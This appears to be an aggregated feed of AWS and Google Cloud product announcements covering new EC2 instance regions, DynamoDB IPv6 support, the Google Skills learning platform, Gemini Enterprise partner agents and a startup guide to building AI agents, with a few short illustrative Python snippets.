Starting today, Amazon Elastic Compute Cloud (Amazon EC2) C6in instances are available in the AWS Mexico (Central) Region. These sixth-generation network optimized instances, powered by 3rd Generation Intel Xeon Scalable processors and built on the AWS Nitro System, deliver up to 200 Gbps of network bandwidth, 2x the network bandwidth of comparable fifth-generation instances.
Customers can use C6in instances to scale the performance of applications such as network virtual appliances (firewalls, virtual routers, load balancers), Telco 5G User Plane Function (UPF), data analytics, high performance computing (HPC), and CPU-based AI/ML workloads. C6in instances are available in 10 different sizes, including a bare metal size, with up to 128 vCPUs. Amazon EC2 sixth-generation x86-based network optimized instances deliver up to 100 Gbps of Amazon Elastic Block Store (Amazon EBS) bandwidth and up to 400K IOPS. C6in instances offer Elastic Fabric Adapter (EFA) networking support on 32xlarge and metal sizes.
C6in instances are available in these AWS Regions: US East (Ohio, N. Virginia), US West (N. California, Oregon), Europe (Frankfurt, Ireland, London, Milan, Paris, Spain, Stockholm, Zurich), Middle East (Bahrain, UAE), Israel (Tel Aviv), Asia Pacific (Hong Kong, Hyderabad, Jakarta, Malaysia, Melbourne, Mumbai, Osaka, Seoul, Singapore, Sydney, Tokyo, Thailand), Africa (Cape Town), South America (Sao Paulo), Canada (Central), Canada West (Calgary), AWS GovCloud (US-West, US-East), and Mexico (Central). To learn more, see the Amazon EC2 C6in instances. To get started, see the AWS Management Console, AWS Command Line Interface (AWS CLI), and AWS SDKs.
Amazon DynamoDB now offers customers the option to use Internet Protocol version 6 (IPv6) addresses in their Amazon Virtual Private Cloud (VPC) when connecting to DynamoDB tables, streams, and DynamoDB Accelerator (DAX), including with AWS PrivateLink Gateway and Interface endpoints. Customers moving to IPv6 can simplify their network stack and meet compliance requirements by using a network that supports both IPv4 and IPv6.
The continued growth of the internet is exhausting available Internet Protocol version 4 (IPv4) addresses. IPv6 increases the number of available addresses by several orders of magnitude and customers no longer need to manage overlapping address spaces in their VPCs. Customers can standardize their applications on the new version of Internet Protocol by moving to IPv6 with a few clicks in the AWS Management Console.
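That scale difference is easy to quantify with Python's standard `ipaddress` module: the 128-bit IPv6 address space is 2^96 times larger than the 32-bit IPv4 space.

```python
import ipaddress

# Sizes of the full IPv4 and IPv6 address spaces.
ipv4_space = ipaddress.ip_network("0.0.0.0/0").num_addresses  # 2**32
ipv6_space = ipaddress.ip_network("::/0").num_addresses       # 2**128

print(ipv4_space)                          # 4294967296
print(ipv6_space // ipv4_space == 2**96)   # True
```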
Support for IPv6 in Amazon DynamoDB is now available in all commercial AWS Regions in the United States and the AWS GovCloud (US) Regions. It will deploy to the remaining global AWS Regions where Amazon DynamoDB is available over the next few weeks.
From the classroom to the boardroom, the world of work is shifting at an incredible pace. As advancements in AI and cloud computing gather speed, it’s not just about adapting — it’s about discovering powerful new ways to thrive, regardless of your role.
To help everyone keep up, we’re announcing three major updates to our learning programs, timed with the launch today of Gemini Enterprise.
A new platform, Google Skills, will bring together nearly 3,000 courses and labs in one place — including content from across Google Cloud, Google DeepMind, Grow with Google and Google for Education.
A new initiative, the Gemini Enterprise Agent Ready (GEAR) program, aims to empower one million developers to start building enterprise-ready AI agents with our new Gemini Enterprise platform.
With these updates, we’re delivering on our commitment to help everyone access the AI learning they need — including our Google Cloud customers in search of skilled developers.
What’s new for Google Cloud learners, customers and partners on Google Skills?
To support people at all skill levels — from students to developers to executives — we’re introducing Google Skills. This new learning platform is designed to help people develop the skills they need to be successful in today’s job landscape, and to enable businesses to find and develop the talent they need to thrive. In the last year alone, people have completed more than 26 million courses, labs and credentials — and now they’re all in one place.
In addition to content from across Google — like new AI research courses from Google DeepMind — this launch brings with it a host of new content for our Cloud customers to keep them on the cutting edge of AI skill building:
1. Gemini Code Assist: AI-powered learning and new skill badges
Gemini Code Assist will help engineers, developers, data scientists and more jump right into coding with Gemini without leaving the Google Skills platform. It’s been enabled in more than 20 hands-on labs and will be part of all relevant labs going forward. And developers can also prove Gemini Code Assist skills by earning a new skill badge: Kickstarting Application Development with Gemini Code Assist.
We’re also meeting the vibe-coding moment with two new skill badges for app devs: Building a Smart Cloud Application with Vibe Coding & MCP establishes foundational knowledge and practical skills in Model Context Protocol server development and vibe coding on Google Cloud. Deploy an Agent with Agent Development Kit empowers devs to build advanced AI systems where different AI parts work together smoothly, using common methods like the Model Context Protocol, Agent-to-Agent protocol and Agent Development Kit.
A better experience for Google Cloud customers and organizations
You asked. We listened. As part of Google Skills, we’ve kept the best of Google Cloud Skills Boost, while adding features you’ve been waiting for on the all-new Google Skills platform. For example, Cloud customers will continue to have access to the entire Google Cloud content library for free, now including new content from Google DeepMind.
We’ve also added a new feature that lets you assign the most relevant courses and hands-on labs to your teams. This personalization benefits your business and accelerates your team’s ability to innovate.
Plus, you can now use company leaderboards — customized for your organization — that spark friendly competition and add a dose of fun. And finally, for Google Skills admins, we’ll be adding features to make reporting more advanced. That means more data, more flexibility and more insights that let you keep track of your team’s progress in real time.
Cloud learning has never been more fun: new gamified features
For organizations, Google Skills makes it easier to keep your teams engaged and up to date. This is key: 74% of decision makers agree that technical learning resources improve employee productivity, and 71% of organizations realize revenue gains after engaging with these resources.1 In other words, more learning is a universal boon to business.
But learning alone isn’t enough. It needs to be fun, engaging and easy to fit into your schedule. That’s why we’re bringing new AI-powered and gamification features to Google Skills to make learning more effective.
Gamified features:
Leagues: Encourage friendly competition based on earned points with this dashboard widget.
Achievements: Celebrate your learning milestones with new visuals and easy options for social sharing.
Learning streaks: Promote consistent learning habits through bonus points and “streak freezes.”
GEAR: A new sprint to empower one million developers
Today, we’re also announcing the Gemini Enterprise Agent Ready (GEAR) program, a new educational sprint designed to empower one million developers on our new agentic platform, Gemini Enterprise. Through a cohort-based approach, we will help them build, deploy and manage agents, and as part of GEAR, developers can earn skill badges through Google Skills.
A direct path to employment; a faster way to hire
Building skills isn’t just good for individual careers — it’s also good for business. That’s why with Google Skills, we’re making it easier for people to get the skills employers are looking for, and for companies to find the talent they need to succeed.
Today, we’re announcing that for those who complete a Google Cloud Certificate in cybersecurity or data analytics in the U.S., there’s now a direct pathway to an interview with leading financial services firm Jack Henry. You’ll get to complete custom, hands-on labs that simulate the company’s real-world scenarios. These labs act as the first stage of the company’s hiring process, giving you a tangible way to showcase your skills and land a new job. We’re excited to expand the model to more Google Cloud customers in the future.
“We are excited for our collaboration with Google Cloud to reimagine talent acquisition. By leveraging Google Cloud Certificates, we have been able to more effectively identify and recruit top talent, helping to fuel our growth to fill critical skill gaps.” –Holly Novak, Chief People Officer, Jack Henry
This initiative is especially important because businesses are actively looking for talent. A recent study found that 82% prefer to recruit and hire professionals who hold these credentials.2
For Google Cloud customers interested in bringing on skilled individuals to your company, learn more about the program here.
We’re just getting started. Whether you’re an individual looking to get hired or a business leader aiming to upskill your teams, there’s something for everyone to thrive in this new world of AI.
Google Cloud believes the future of AI should be open, flexible, and interoperable. Today, with the launch of Gemini Enterprise – our new agentic platform that brings the best of Google AI to every employee, for every workflow – we’re introducing powerful new opportunities for partners to integrate their solutions and bring them to market.
Our AI ecosystem is already thriving, with thousands of partner-built agents available to Google Cloud customers today. More importantly, this curated set of agents has been validated by Google Cloud, ensuring customers have confidence in their quality and security as they use agents to transform their businesses.
Extending partner-built agents in Gemini Enterprise
Our goal is to make Gemini Enterprise the central destination for customers to access the agents they use daily, including those from leading technology and SaaS providers. With the combination of Gemini Enterprise and the Agent2Agent (A2A) protocol, agents can securely communicate and coordinate complex tasks with each other. Some of the partners announcing Gemini Enterprise-compatible agents today include:
Box: The Box AI agent lets users ask questions, summarize complex documents, extract data from files, and generate new content while respecting existing permissions in Box.
Dun & Bradstreet: D&B’s Look Up agent uses the D-U-N-S Number, a globally trusted identifier, to unify business data from internal and third-party sources for accurate and efficient integration across enterprise workflows.
Manhattan Associates: Manhattan’s Solution Navigator agent provides instant answers on Manhattan Active solutions, policies, and operations to accelerate response times and efficiency.
OpenText: Core Content Aviator simplifies content management, enabling users to search and summarize information with AI assistance, including document generation and multilingual translation.
Salesforce: Agents built on Agentforce and data from Slack will be accessible to users within Gemini Enterprise, enhancing their AI-powered productivity and business insights.
S&P Global: S&P’s Data Retrieval agent helps users analyze earnings calls, perform market research, and retrieve financial metrics–all with direct source citations.
ServiceNow: Enabled by A2A and ServiceNow AI Agent Fabric, ServiceNow AI Agents for Service Observability connects with Google Gemini-powered agents to detect, investigate, and recommend fixes for issues in customer cloud deployments – streamlining incident management, and enabling greater organizational agility.
Workday: Workday agents, such as its Self-Service Agent, deliver immediate insights and enable quick actions, like flagging potential budget overruns, submitting time off, creating HR cases, managing pay information, and more – all directly within the employee’s flow of work.
These and many other partners have committed to integrate their agents with Gemini Enterprise, including Amplitude, Avalara, CARTO, Cotality, Dynatrace, Elastic, Fullstory, HubSpot, Invideo, Optimizely, Orion by Gravity, Pegasystems, Quantum Metric, Supermetrics, Trase Systems, UiPath, and Vianai.
Discover validated agents using natural language search
In addition to deploying partner agents that integrate with Gemini Enterprise, customers can also now use a new, Gemini-powered AI agent finder – with natural language search – to help discover the right AI agents for their needs. Customers can search for agents from trusted vendors and filter by industry, use case, and whether they have been validated for A2A and deployment to Gemini Enterprise. These agents can then be purchased from Google Cloud Marketplace or directly through partners, and deployed into their environments.
This curated discovery experience is enabled by our enhanced AI agent ecosystem program and a rigorous framework for partners to validate their agents. We’ve also introduced the new “Google Cloud Ready – Gemini Enterprise” designation to recognize agents that meet our highest standards for performance and quality, helping accelerate adoption of trusted solutions and giving partners a new path to monetize their agents.
Growing partner services to help customers succeed with AI
Google Cloud remains partner-led in our professional services approach. With the launch of Gemini Enterprise today, our consulting partners are already expanding their services offerings to help customers accelerate their adoption of AI agents. In fact, many of these partners are already powering their own businesses with Gemini Enterprise. Major expansions include:
Accenture is driving successful adoption of Google Cloud’s AI technology with clients across industries; expanding agentic capabilities via the Accenture and Google Cloud generative AI Center of Excellence; and launching agents on Google Cloud Marketplace.
Deloitte is leveraging its “Agent Fleet” of live agents to help clients utilize Gemini Enterprise to deploy industry-tailored agents and co-innovate at scale.
Capgemini has developed a variety of agents with Google Cloud’s AI technology across sectors, which it will bring to Gemini Enterprise and the Google Cloud Marketplace.
Cognizant is accelerating agentic AI adoption for its clients through internal use of Gemini Enterprise and by investing in Google Cloud Centers of Excellence around the globe.
GlobalLogic, a Hitachi Group Company, will adopt Gemini Enterprise internally and provide digital engineering services to accelerate customer adoption, including building AI Agents securely and at scale.
KPMG is using Gemini Enterprise to enhance the speed, accuracy, and quality of client delivery and to elevate the employee experience at KPMG with AI and agents, making everyday work easier.
PwC is advancing client AI transformation by combining its agent OS technology with Gemini Enterprise, including the deployment of agents it has used successfully internally.
Get started bringing agents to Gemini Enterprise
Gemini Enterprise is available today and includes access to thousands of agents from our ecosystem. Partners interested in learning more can visit the AI Agent Program page.
We’re committed to providing partners with the platform and resources needed to scale their AI agents on Gemini Enterprise, and we look forward to seeing the solutions they deliver to customers.
Today, we are excited to announce that Amazon SageMaker notebook instances support Amazon Linux 2023. You can now choose Amazon Linux 2023 for new Amazon SageMaker notebook instances to take advantage of the latest innovations and enhanced security features.
Amazon SageMaker notebook instances are fully managed Jupyter Notebooks with pre-configured development environments for data science and machine learning. Data scientists and developers can use SageMaker Notebooks to interactively explore, visualize and prepare data, and build and deploy machine learning models on SageMaker.
Amazon Linux 2023 (AL2023) is a general-purpose rpm-based Linux distribution and successor to Amazon Linux 2 (AL2). Amazon Linux 2023 simplifies operating system management through its secure, stable, and high-performance runtime environment. This Linux distribution follows a predictable two-year major release cycle with five years of long-term support. The first two years provide standard support with quarterly security patches, bug fixes, and new features, followed by three years of maintenance. Enhanced security features include SELinux support and FIPS 140-3 validation for cryptographic modules.
With this launch, you now have the option to launch a notebook instance with either AL2023 or AL2. For more details about this launch and instructions on how to get started with AL2023 notebook instances, please refer to the Amazon Linux 2023 documentation.
AWS announces that Amazon EC2 I7ie instances are now available in the AWS South America (São Paulo) Region. Designed for large, storage I/O intensive workloads, I7ie instances are powered by 5th Gen Intel Xeon Processors with an all-core turbo frequency of 3.2 GHz, offering up to 40% better compute performance and 20% better price performance over existing I3en instances. I7ie instances offer up to 120 TB of local NVMe storage density (the highest in the cloud for storage optimized instances) and up to twice as many vCPUs and memory compared to prior-generation instances. Powered by 3rd generation AWS Nitro SSDs, I7ie instances deliver up to 65% better real-time storage performance, up to 50% lower storage I/O latency, and 65% lower storage I/O latency variability compared to I3en instances.
I7ie instances are high-density storage optimized instances, ideal for workloads that require fast local storage with high random read/write performance and consistently low latency when accessing large data sets. These instances are available in 9 different virtual sizes and deliver up to 100 Gbps of network bandwidth and 60 Gbps of bandwidth for Amazon Elastic Block Store (EBS).
AWS announces the general availability of new general-purpose Amazon EC2 M8a instances. M8a instances are powered by 5th Gen AMD EPYC processors (formerly code-named Turin) with a maximum frequency of 4.5 GHz, and deliver up to 30% higher performance and up to 19% better price performance compared to M7a instances.
M8a instances deliver 45% more memory bandwidth compared to M7a instances, making them ideal even for latency-sensitive workloads. M8a instances deliver even higher performance gains for specific workloads: they are 60% faster on the GroovyJVM benchmark and up to 39% faster on the Cassandra benchmark compared to Amazon EC2 M7a instances. M8a instances are SAP-certified and offer 12 sizes, including 2 bare metal sizes. This range of instance sizes allows customers to precisely match their workload requirements.
M8a instances are built on the AWS Nitro System and ideal for applications that benefit from high performance and high throughput such as financial applications, gaming, rendering, application servers, simulation modeling, mid-size data stores, application development environments, and caching fleets.
M8a instances are available in the following AWS Regions: US East (Ohio), US West (Oregon), and Europe (Spain). To get started, sign in to the AWS Management Console. Customers can purchase these instances via Savings Plans, On-Demand instances, and Spot instances. For more information visit the Amazon EC2 M8a instance page or the AWS News blog.
Amazon Elastic Compute Cloud (Amazon EC2) R8gd instances with up to 11.4 TB of local NVMe-based SSD block-level storage are now available in Europe (Ireland), Asia Pacific (Sydney, Malaysia), South America (São Paulo), and Canada (Central) AWS Regions. These instances are powered by AWS Graviton4 processors, delivering up to 30% better performance over Graviton3-based instances. They have up to 40% higher performance for I/O intensive database workloads, and up to 20% faster query results for I/O intensive real-time data analytics than comparable AWS Graviton3-based instances. These instances are built on the AWS Nitro System and are a great fit for applications that need access to high-speed, low latency local storage.
Each instance is available in 12 different sizes. They provide up to 50 Gbps of network bandwidth and up to 40 Gbps of bandwidth to the Amazon Elastic Block Store (Amazon EBS). Additionally, customers can now adjust the network and Amazon EBS bandwidth on these instances by 25% using EC2 instance bandwidth weighting configuration, providing greater flexibility with the allocation of bandwidth resources to better optimize workloads. These instances offer Elastic Fabric Adapter (EFA) networking on 24xlarge, 48xlarge, metal-24xl, and metal-48xl sizes.
Amazon Elastic Compute Cloud (Amazon EC2) M8gd instances with up to 11.4 TB of local NVMe-based SSD block-level storage are now available in Europe (London), Asia Pacific (Sydney, Malaysia), and Canada (Central) AWS Regions. These instances are powered by AWS Graviton4 processors, delivering up to 30% better performance over Graviton3-based instances. They have up to 40% higher performance for I/O intensive database workloads, and up to 20% faster query results for I/O intensive real-time data analytics than comparable AWS Graviton3-based instances. These instances are built on the AWS Nitro System and are a great fit for applications that need access to high-speed, low latency local storage.
Each instance is available in 12 different sizes. They provide up to 50 Gbps of network bandwidth and up to 40 Gbps of bandwidth to the Amazon Elastic Block Store (Amazon EBS). Additionally, customers can now adjust the network and Amazon EBS bandwidth on these instances by 25% using EC2 instance bandwidth weighting configuration, providing greater flexibility with the allocation of bandwidth resources to better optimize workloads. These instances offer Elastic Fabric Adapter (EFA) networking on 24xlarge, 48xlarge, metal-24xl, and metal-48xl sizes.
Today, AWS announces a new pricing and cost estimation capability in Amazon Q Developer. Amazon Q Developer is the most capable generative AI-powered assistant for software development. With this launch, customers can now use Amazon Q Developer to get information about AWS product and service pricing, availability, and attributes, helping them select the right resources and estimate workload costs using natural language.
When architecting new workloads on AWS, customers need to estimate costs so they can evaluate cost/performance tradeoffs, set budgets, and plan future spending. Customers can now use Amazon Q Developer to retrieve detailed product attribute and pricing information using natural language, making it easier to estimate the cost of new workloads without having to review multiple pricing pages or specify detailed API request parameters. Customers can now ask questions about service pricing (e.g., “How much does RDS extended support cost?”), the cost of a planned workload (e.g., “I need to send 1 million notifications per month to email, and 1 million to HTTP/S endpoints. Estimate the monthly cost using SNS.”), or the relative costs of different resources (e.g., “What is the cost difference between an Application Load Balancer and a Network Load Balancer?”). To answer these questions, Amazon Q Developer retrieves information from the AWS Price List APIs.
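Under the hood, such an estimate is just usage quantities multiplied by per-unit rates. The toy sketch below illustrates the composition; the rates are hypothetical placeholders, not actual AWS prices, and real estimates should pull current figures from the AWS Price List APIs.

```python
def estimate_monthly_cost(usage: dict, rates: dict) -> float:
    """Sum usage quantities (in millions of requests per month) times
    per-million rates in dollars. Purely illustrative arithmetic."""
    return sum(qty * rates[dimension] for dimension, qty in usage.items())

# Hypothetical placeholder rates ($ per million), NOT actual AWS pricing.
rates = {"email_notifications": 2.00, "http_notifications": 0.60}
# The workload from the example question: 1M email + 1M HTTP/S per month.
usage = {"email_notifications": 1.0, "http_notifications": 1.0}

print(round(estimate_monthly_cost(usage, rates), 2))  # 2.6
```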
Amazon Location Service has updated its mapping data to reflect Vietnam’s recent administrative reorganization, which consolidated the country’s provinces from 63 to 34 administrative units. This update enables customers in Vietnam to seamlessly align their operations with the new administrative structure that took effect July 1, 2025.
The update includes changes to Vietnam’s administrative boundaries, names, and hierarchical structure across all levels. The refresh incorporates the new structure of 34 provincial-level administrative units, consisting of 28 provinces and 6 centrally managed cities, along with consolidated commune-level administrative boundaries from 10,310 to 3,321 units. Place names and administrative components in Points of Interest (POI) have been updated while preserving street-level address accuracy.
This update supports use cases across industries such as logistics, e-commerce, and public services where accurate administrative boundary data is essential for operations like delivery zone planning, service area management, and address validation. The updated data is automatically available to customers querying Vietnam address data through Amazon Location Service.
Amazon Location Service enables developers to easily and securely add location data and mapping functionality to applications. Amazon Location Service with GrabMaps is available in the Singapore and Malaysia Regions. To learn more, check out our developer guide.
Amazon Elastic Compute Cloud (Amazon EC2) C8gd instances with up to 11.4 TB of local NVMe-based SSD block-level storage are now available in Europe (Ireland) and Asia Pacific (Sydney, Malaysia) AWS Regions. These instances are powered by AWS Graviton4 processors, delivering up to 30% better performance over Graviton3-based instances. They have up to 40% higher performance for I/O intensive database workloads, and up to 20% faster query results for I/O intensive real-time data analytics than comparable AWS Graviton3-based instances. These instances are built on the AWS Nitro System and are a great fit for applications that need access to high-speed, low latency local storage.
Each instance is available in 12 different sizes. They provide up to 50 Gbps of network bandwidth and up to 40 Gbps of bandwidth to the Amazon Elastic Block Store (Amazon EBS). Additionally, customers can now adjust the network and Amazon EBS bandwidth on these instances by 25% using EC2 instance bandwidth weighting configuration, providing greater flexibility with the allocation of bandwidth resources to better optimize workloads. These instances offer Elastic Fabric Adapter (EFA) networking on 24xlarge, 48xlarge, metal-24xl, and metal-48xl sizes.
Startups are using agentic AI to automate complex workflows, create novel user experiences, and solve business problems that were once considered technically impossible. Still, charting the optimal path forward, especially with the integration of AI agents, often presents significant technical complexity.
To help startups navigate this new landscape, we’re launching our Startup technical guide: AI agents. It provides a systematic, operations-driven roadmap for embracing the potential of agentic systems.
What does this potential look like? AI agents combine the intelligence of advanced AI models with access to tools so they can take actions on your behalf, under your control. Unlike traditional AI, agentic AI can break down intricate tasks, refine plans, and dynamically utilize external resources and tools. The key takeaway is that AI agents can tackle complex, multi-step problems, ultimately transforming AI from a passive tool into a proactive problem-solver.
If your startup is looking to get in on the agentic AI action, here are some initial steps to consider. And when you’re ready to get building, you can get more details in our guide or even reach out to one of our AI experts at Google Cloud.
Choose your path: Build, use, or integrate
Every startup’s journey is unique, which is why Google Cloud offers a flexible agent ecosystem that supports the comprehensive development of agentic systems. You can:
Build your own agents: For teams that require a high degree of control over agent behavior, the open-source Agent Development Kit (ADK) is your go-to development framework. ADK is built for a custom, code-first approach, empowering developers to build, manage, evaluate, and deploy AI-powered agents. For an application-first approach, Google Agentspace orchestrates your entire AI workforce and empowers non-technical team members to build custom agents using a no-code designer.
Use Google Cloud agents: With rapid prototyping and easy ways to integrate AI into your existing apps, managed agents let you focus on core business logic rather than managing infrastructure. Gemini Code Assist is an AI-powered assistant for developers, while Gemini Cloud Assist is an AI expert for your Google Cloud environment.
Bring in partner agents: For more specialized use cases, you can easily integrate third-party or open-source agents into your stack via the Google Cloud Marketplace. You can also explore the Agent Garden to deploy prebuilt ADK agents that already support data reasoning and inter-agent collaboration.
The Startup technical guide: AI agents provides a complete roadmap for building production-ready AI agents. Here are four core steps we’ve identified that can help define your first agent using the Agent Development Kit (ADK).
Step 1: Give your agent an identity
First, define your agent’s core identity. You’ll want to give it a unique name for logging and delegation, write a clear description of its capabilities so other agents can route tasks to it, and pick the right AI foundation model (like Gemini 2.5 Pro or Gemma) to power its reasoning. Precision here is critical. The model you’re using treats every part of this definition as a prompt, and vague descriptions can lead to “context poisoning,” causing the agent to pursue incorrect goals.
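The three identity fields can be sketched as plain data before wiring them into ADK. The dataclass below is illustrative only — it mirrors the name, description, and model parameters the guide describes, but it is not ADK’s own API, and the agent name shown is a made-up example:

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class AgentIdentity:
    """Illustrative stand-in for the identity an ADK agent is given."""
    name: str         # unique name, used for logging and task delegation
    description: str  # read by other agents when routing tasks
    model: str        # foundation model that powers the agent's reasoning

# Hypothetical example: a billing-support agent.
support_bot = AgentIdentity(
    name="billing_support_agent",
    description="Answers billing questions and escalates refund requests.",
    model="gemini-2.5-pro",
)
```

Note how the description states concretely what the agent does; a vague description here is exactly what invites the “context poisoning” the guide warns about.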
Step 2: Write the “prime directive” with instructions
Next, give your agent its “prime directive” using the instruction parameter. This is where you define its persona, core objectives, and do’s and don’ts. Effective instructions clearly specify the desired outcomes for your agent, provide examples for complex tasks (e.g. few-shot prompting), and guide the agent on how to use its tools.
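A “prime directive” along these lines might look like the string below, which would be passed as the agent’s instruction parameter. The persona, objectives, do’s and don’ts, tool name, and few-shot example are all hypothetical:

```python
# Illustrative instruction for a hypothetical billing-support agent.
INSTRUCTION = """\
You are a concise, polite billing-support assistant.

Objectives:
- Answer questions about invoices and charges.
- Use the lookup_invoice tool before quoting any amount.

Do:
- Cite the invoice ID in every answer.
Don't:
- Guess amounts; if lookup_invoice fails, say so.

Example (few-shot):
User: Why was I charged twice in March?
Assistant: Invoice INV-1042 shows the duplicate charge was reversed on
2024-03-18; the net amount billed for March is unchanged.
"""
```

The structure matters more than the exact wording: a persona up top, explicit objectives, guardrails, and at least one worked example for any task the agent tends to get wrong.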
Step 3: Grant superpowers with tools
Transform your agent from a pure conversationalist into a system that can take action by equipping it with functions to call external APIs, search databases, or interact with other systems. In doing so, you grant it broader capabilities. For example, a bug assistant agent uses tools to fetch user details from a CRM or create a ticket in a project management system. Since the agent chooses which tool to use based on its name and description, making them clear and unique is crucial to avoid looping behaviors or incorrect actions.
Step 4: Master the lifecycle: test, deploy, operate
Building an agent is a continuous cycle, not a one-off task. Because agentic systems are non-deterministic, standard unit tests are insufficient. Our guide shows you how to evaluate an agent’s “trajectory” — its step-by-step reasoning — to ensure quality and reliability. This operational rigor, which we call AgentOps, is key to confidently deploying your agent on platforms like Vertex AI Agent Engine or Cloud Run and operating it safely in production.
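The core idea behind trajectory evaluation can be sketched in a few lines: record which tools the agent called for a test case and compare against the expected sequence. Real AgentOps tooling is far richer than this, so treat it only as a minimal illustration of the concept:

```python
def trajectory_matches(expected: list[str], actual: list[str]) -> bool:
    """True when the agent called the expected tools in the expected order."""
    return expected == actual

# Hypothetical test case for a bug-assistant agent.
expected_calls = ["lookup_user", "create_ticket"]
observed_calls = ["lookup_user", "create_ticket"]
assert trajectory_matches(expected_calls, observed_calls)
```

Checking the trajectory rather than only the final answer is what catches an agent that reaches the right output via the wrong (and unrepeatable) path.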
Agents already in action
Startups are constantly innovating on their agentic journeys. Here’s a look at two startups that use Google Cloud’s models and architecture to run their agentic systems:
Actionable insights for better employee engagement
Wotter, a provider of next-generation employee engagement solutions, seeks to better understand what employees want. It empowers organizations with the insights they need to get the best out of their people by asking the right question to the right person at the right time.
Gemini 2.5 Flash was the right foundation model for Wotter’s smart assistant, blending speed with long-context reasoning. Wotter’s Flash models use agentic methods to manage extensive and ongoing sources of data, such as employee interactions and feedback, while still responding to queries on this data in seconds – and at a lower cost per query.
Eliminating a long-standing legal industry pain point
As people in the legal industry know too well, complex document reviews can ruin nights and weekends while turning focus away from strategic work. Enter Harvey, which is equipping legal professionals with domain-specific AI to maximize efficiency and keep legal professionals’ attention on activities that move the needle for their firms and clients.
Harvey evaluated several foundation models and ultimately found that Gemini 2.5 Pro achieved the leading score of 85.02% on its BigLaw Bench benchmark, the first of its kind to represent complex legal tasks. Gemini 2.5 Pro showcased strong reasoning across inputs consisting of hundreds of pages of materials—a common scenario in legal work. The model then used these materials to generate longer-form and comprehensive outputs, enabling deeper insights and analyses.
These core capabilities proved Gemini 2.5 Pro’s potential across complex legal work that requires reasoning over large sets of documents to support diligence, review, and use case drafting. Further, Vertex AI provides the stringent security and privacy guarantees that build trust in the Harvey platform among clientele. Gemini and Vertex AI are now an important part of Harvey’s vision for future product development.
Build what’s next, faster
The Startup technical guide: AI agents provides the blueprint your team needs to turn your vision into a production-ready reality. By using a code-first framework like ADK and the operational principles in this guide, you can move beyond informal “vibe-testing” to a rigorous, reliable process for building and managing your agent’s entire lifecycle. For your startup, this disciplined approach becomes a powerful competitive advantage.
With this feature, customers can selectively back up individual databases within a multi-database RDS for Db2 instance, enabling efficient migration of specific databases to another instance or on-premises environment. Using a simple backup command, customers can easily create database copies for development and testing environments, while also meeting their compliance requirements through separate backup copies. By backing up specific databases instead of full instance snapshots, customers can reduce their storage costs.
This feature is now available in all AWS Regions where Amazon RDS for Db2 is offered. For detailed information about configuring and using native database backups, visit the Amazon RDS for Db2 documentation. For pricing details, see the Amazon RDS pricing page.